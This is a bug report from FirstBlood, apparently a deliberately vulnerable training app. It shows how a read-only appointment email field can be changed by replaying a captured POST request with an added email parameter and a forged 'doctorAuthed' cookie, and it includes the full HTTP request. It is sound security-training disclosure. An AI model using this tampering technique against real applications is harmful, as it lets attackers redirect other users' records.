FirstBlood-#877 — It is possible to modify the email address of an appointment.
This issue was discovered on FirstBlood v2
On 2021-10-29, vigilante Level 4 reported:
It is possible to modify the email address of an appointment. The same vulnerability was present in V1 of First Blood.
When modifying an appointment the application tells us that "For safeguarding reasons you are only able to modify certain information about your appointment." The "patient email" field is grayed and we're unable to modify it through the webpage. However if we capture the POST request to modify the appointment message, we will be able to modify the email field.
Steps to Reproduce:
- Create an appointment with email "ff".
- Log in into a doctor's account so we get a "doctorAuthed" cookie in Step 5.
- Go to modify that appointment, /manageappointment.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41
- Click on "modify event" and capture the request with Burp
- Replay the request and add "&email=changedemail"
POST /api/ma.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41 HTTP/1.1 Host: ca20e7622a6e-vigilante.a.firstbloodhackers.com Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=b0b1f17cbc0fdc9a9ce23dfdf User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Site-Req: permitted Csrf: 99215d4e-0ff3-4275 Content-Length: 71 Origin: https://ca20e7622a6e-vigilante.a.firstbloodhackers.com Referer: https://ca20e7622a6e-vigilante.a.firstbloodhackers.com/manageappointment.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close message=test&id=2dbd91e1-b700-455e-a846-322be1985c41&email=changedemail
- After sending this, the patient's email address will change to "changedemail".
If someone got a hold of our appointment id and they added the "doctorAuthed" cookie, they'd be able to change the email address to their own email address.
FirstBlood ID: 33
Vulnerability Type: Application/Business Logic
Our mistake: We did not intentionally leave the code to change emails if the correct values were set, however it created interesting results because most discovered this but missed bug ID
21 and whilst it was not possible to modify via integer, if the ID was known it would still work.